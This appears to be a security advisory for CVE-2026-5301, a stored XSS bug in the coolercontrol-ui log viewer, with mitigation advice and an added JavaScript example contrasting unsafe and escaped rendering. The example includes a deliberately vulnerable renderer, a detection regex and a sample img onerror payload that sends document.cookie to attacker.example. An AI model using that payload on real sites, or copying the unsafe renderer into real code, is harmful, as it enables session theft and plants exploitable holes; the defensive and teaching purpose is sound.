Platform
vue
Component
coolercontrol-ui
Fixed in
4.0.0
CVE-2026-5301 describes a stored Cross-Site Scripting (XSS) vulnerability in coolercontrol-ui, a Vue.js-based user interface. The UI renders log entries without neutralizing markup contained in them, so an attacker who can get a crafted line written into the log (which the advisory describes as possible without authentication) can have arbitrary JavaScript executed in the browser of anyone who later opens the log viewer, with account takeover among the possible consequences. Versions from 2.0.0 up to, but not including, 4.0.0 are affected; version 4.0.0 contains the fix.
The impact is that of any stored XSS. The injected script runs in the victim's browser under the application's origin, so it can read anything the UI can read, including session cookies not marked HttpOnly and tokens kept in browser storage, send requests to the backend with the victim's session, redirect the user to another site, or alter what the page displays. XSS does not execute code on the server by itself, but it can drive every action the UI exposes to the affected user. Because the payload is stored and the injection path is described as unauthenticated, every user who subsequently views the log is exposed, not only the one present when the entry was written; if the UI is trusted by other services, compromise can extend to those as well.
CVE-2026-5301 was publicly disclosed on 2026-04-08. No public proof-of-concept (PoC) code has been released at the time of writing, and the vulnerability is not listed in the CISA KEV catalog. Stored XSS in a log viewer is simple to reproduce once the injection path is known, so a PoC may well appear; the current EPSS score of 0.02% (6th percentile) nonetheless indicates a low predicted probability of exploitation in the wild.
Exploit Status
EPSS
0.02% (6th percentile)
The primary mitigation for CVE-2026-5301 is to upgrade coolercontrol-ui to version 4.0.0 or later. If an immediate upgrade is not possible, address the underlying weakness, which is missing output encoding: every log entry must be rendered as text, never as HTML, so the rendering path of the log viewer is what needs a local patch (in Vue terms, plain {{ }} interpolation rather than v-html or manual DOM insertion). A Content Security Policy that disallows inline script adds defence in depth. A Web Application Firewall in front of the UI can block common XSS payloads in incoming requests, but it is bypassable and does nothing about poisoned entries already stored in the log, so review existing log entries for markup before relying on the viewer again.
Update to version 4.0.0 or later to fix the XSS vulnerability. This release corrects the improper neutralization of input during web page generation (CWE-79) so that log entries are rendered as text and can no longer inject JavaScript.
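The following is an added example, not code from the coolercontrol-ui project, showing the rendering pattern that creates this class of bug beside the corrected one, plus a small triage helper for spotting poisoned entries already stored in a log. The log format, the entry fields, the function names and the sample lines (including the attacker hostname) are all constructed for the example; how coolercontrol-ui actually renders its log is not shown on this page.

```javascript
// Added example (not coolercontrol-ui's own code): rendering untrusted log
// entries in a browser without letting them become markup.
//
// Assumptions: log entries arrive as plain strings and the UI decides how to
// render them. escapeHtml, renderLogEntryUnsafe, renderLogEntrySafe,
// findSuspiciousEntries and SAMPLE_LOG are constructed for this example.

// Minimal HTML entity escaping: the five characters that can change the
// meaning of text placed into an element body or a quoted attribute.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the log text is interpolated straight into markup.
// In a Vue template this is what `<div v-html="entry.message"></div>` does.
function renderLogEntryUnsafe(entry) {
  return `<div class="log-line">[${entry.level}] ${entry.message}</div>`;
}

// Fixed pattern: every untrusted field is escaped before it touches markup.
// In a Vue template this is what `<div>{{ entry.message }}</div>` does,
// because mustache interpolation escapes by default.
function renderLogEntrySafe(entry) {
  const level = escapeHtml(entry.level);
  const message = escapeHtml(entry.message);
  return `<div class="log-line">[${level}] ${message}</div>`;
}

// Triage heuristic for stored entries: a log line should never carry an HTML
// tag, a javascript: URL or an on*= event handler. False positives are
// possible (e.g. an option named "one=..."), so treat hits as leads to review.
const SUSPICIOUS = /<\s*\/?\s*[a-z!]|javascript:|\bon\w+\s*=/i;
function findSuspiciousEntries(entries) {
  return entries.filter((e) => SUSPICIOUS.test(e.message));
}

// Constructed sample log with one poisoned entry of the kind the advisory
// describes; attacker.example is a reserved, non-routable domain.
const SAMPLE_LOG = [
  { level: "INFO", message: "Fan profile 'quiet' applied to hwmon2/pwm1" },
  { level: "WARN", message: "Sensor read timed out after 500 ms" },
  {
    level: "ERROR",
    message:
      "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
  },
];

// Renders the poisoned entry both ways and counts flagged entries, so the
// difference between the two rendering paths can be inspected directly.
function demo() {
  const poisoned = SAMPLE_LOG[2];
  return {
    unsafe: renderLogEntryUnsafe(poisoned),
    safe: renderLogEntrySafe(poisoned),
    flagged: findSuspiciousEntries(SAMPLE_LOG).length,
  };
}

console.log(demo());
```

The unsafe renderer emits the `<img ... onerror=...>` tag verbatim, so a browser parsing that string would fire the handler; the safe renderer emits `&lt;img ...&gt;`, which displays as literal text. The same distinction applies to any other sink: `textContent`, `{{ }}` and `createTextNode` are safe for untrusted strings, while `innerHTML`, `v-html` and string-built templates are not.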
CVE-2026-5301 is a stored Cross-Site Scripting (XSS) vulnerability in coolercontrol-ui versions from 2.0.0 up to, but not including, 4.0.0 that lets attackers inject JavaScript through poisoned log entries rendered by the log viewer.
You are affected if you run any coolercontrol-ui version from 2.0.0 up to, but not including, 4.0.0.
Upgrade to coolercontrol-ui 4.0.0 or later. Until you can, make sure every log entry is output-encoded in the log viewer, that is, rendered as text rather than HTML.
No active exploitation has been confirmed and the EPSS score is low, but stored XSS of this kind is straightforward to reproduce, so a proof of concept may appear.
Refer to the coolercontrol-ui project's repository or website for the official advisory and release notes regarding CVE-2026-5301.